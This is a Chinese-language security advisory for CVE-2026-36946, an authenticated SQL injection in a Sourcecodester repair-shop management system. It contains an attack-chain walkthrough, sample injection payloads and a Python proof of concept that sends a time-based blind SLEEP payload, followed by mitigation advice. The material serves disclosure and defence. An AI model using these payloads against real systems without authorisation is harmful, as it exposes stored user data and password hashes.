IPBUF安全漏洞报告
English
CVE-2026-36946 CVSS 2.7 低危

CVE-2026-36946 计算机维修店管理系统SQL注入漏洞

披露日期: 2026-04-13
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-36946
漏洞类型
SQL注入
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Sourcecodester Computer and Mobile Repair Shop Management System

相关标签

SQL注入低危SourcecodesterWeb安全CVE-2026-36946

漏洞概述

Sourcecodester Computer and Mobile Repair Shop Management System v1.0版本存在SQL注入漏洞。该漏洞位于/rsms/admin/inquiries/view_details.php文件中,由于应用程序未对用户提交的输入数据进行充分的过滤和验证,导致攻击者能够构造恶意的SQL语句。尽管利用此漏洞需要高权限(PR:H),但一旦成功利用,攻击者可能窃取数据库中的敏感信息,对系统机密性造成一定影响。

技术细节

该漏洞属于典型的SQL注入漏洞,其根本原因是信任边界未做好过滤。在受影响系统的/rsms/admin/inquiries/view_details.php文件中,代码逻辑直接将HTTP请求中的参数(通常为ID或标识符)拼接到SQL查询语句中执行,未使用预编译语句(Prepared Statements)或ORM框架进行安全处理。由于CVSS向量指出需要高权限(PR:H),推测该接口位于管理员后台。攻击者首先需要获取管理员账号密码登录系统,随后在访问详情页面时,拦截HTTP请求并将参数修改为SQL Payload(如UNION SELECT或基于布尔的盲注语句)。数据库引擎会将注入的恶意代码当作SQL指令执行,从而绕过认证逻辑或直接查询数据库中的其他表数据(如管理员哈希、用户信息等)。

攻击链分析

STEP 1
1. 信息收集与认证
攻击者发现目标使用Sourcecodester Computer and Mobile Repair Shop Management System v1.0,并通过钓鱼或暴力破解获取管理员后台的高权限账号密码。
STEP 2
2. 定位漏洞点
攻击者登录后台,分析功能模块,定位到/rsms/admin/inquiries/view_details.php文件,并测试该页面接收的参数是否存在过滤缺失。
STEP 3
3. 构造恶意Payload
攻击者构造特定的SQL注入Payload(例如 ' OR 1=1-- 或 UNION SELECT),旨在绕过原有查询逻辑或提取数据库结构信息。
STEP 4
4. 执行注入攻击
攻击者将Payload注入到HTTP请求参数中发送给服务器,后端数据库执行恶意SQL语句,返回敏感数据(如用户表、密码哈希等)。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-36946 # Target: Sourcecodester Computer and Mobile Repair Shop Management System v1.0 # Endpoint: /rsms/admin/inquiries/view_details.php import requests def check_sqli(target_url, session_cookie): # Assuming the vulnerable parameter is 'id' based on the filename 'view_details.php' # Payload to check for time-based blind SQL injection payload = "1' AND SLEEP(5)-- -" headers = { "Cookie": f"PHPSESSID={session_cookie}" } params = { "id": payload } try: print(f"[+] Sending payload to {target_url}") response = requests.get(target_url, headers=headers, params=params, timeout=10) # If response time is greater than 5 seconds, it indicates the SQL was executed if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! The application is vulnerable to SQL Injection.") else: print("[-] Vulnerability not detected or payload incorrect.") except requests.exceptions.RequestException as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with actual target URL and a valid authenticated session cookie # Note: Exploitation requires High Privileges (Admin) target = "http://localhost/rsms/admin/inquiries/view_details.php" session = "valid_admin_session_id_here" check_sqli(target, session)

影响范围

Sourcecodester Computer and Mobile Repair Shop Management System 1.0

防御指南

临时缓解措施
建议管理员立即检查系统日志,确认是否遭受过此类攻击。在未修复漏洞前,应严格限制对后台管理系统的访问来源IP,并部署Web应用防火墙(WAF)规则以拦截针对view_details.php的常见SQL注入攻击模式。同时,强制所有管理员更改密码,防止凭证泄露导致权限被滥用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表